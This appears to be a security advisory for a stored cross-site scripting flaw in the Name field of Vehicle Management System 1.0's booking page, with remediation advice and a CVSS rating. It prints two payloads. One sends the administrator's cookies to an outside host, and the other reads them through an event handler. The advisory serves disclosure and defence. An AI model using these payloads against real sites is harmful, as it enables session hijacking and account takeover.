Vehicle Management System 1.0 - Stored Cross-Site Scripting (XSS)
Vehicle Management System 1.0 contains a Stored Cross-Site Scripting (XSS) vulnerability in the Name parameter of /vehicle-management/booking.php. A malicious actor can inject malicious payloads into the Name field, which are stored and executed when an administrator views the booking list on /vehicle-management/bookinglist.php. This can lead to session hijacking or administrative account takeover.
Name=
/vehicle-management/booking.php
/vehicle-management/bookinglist.php
Type: Cross-Site Scripting (XSS)
Vendor: Vehicle Management System
Affected Version: 1.0
Guest User Attack:
A guest user inputs a payload into the Name parameter at /vehicle-management/booking.php. The malicious payload gets stored and executed when an admin views /vehicle-management/bookinglist.php. Example payload for session hijacking:
<img src=x onerror=this.src='http://oastify.com"+document.cookie>
Another payload can trigger an alert or perform other malicious actions without requiring cookies:
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
Note: A SQL Injection error may occur during payload submission, but it will still get stored and executed.
Exploiting this vulnerability allows attackers to:
Execute arbitrary JavaScript in the context of the administrator’s session.
Hijack administrator sessions via stolen cookies.
Perform unauthorized actions or escalate privileges.
Sanitize and encode user input for all parameters, especially Name.
Implement a Content Security Policy (CSP) to limit script execution.
Update to a patched version if available.
High (CVSS: 8.2)
Attack Vector: Network
Privileges Required: Low
User Interaction: Partially Required (Admin views booking list)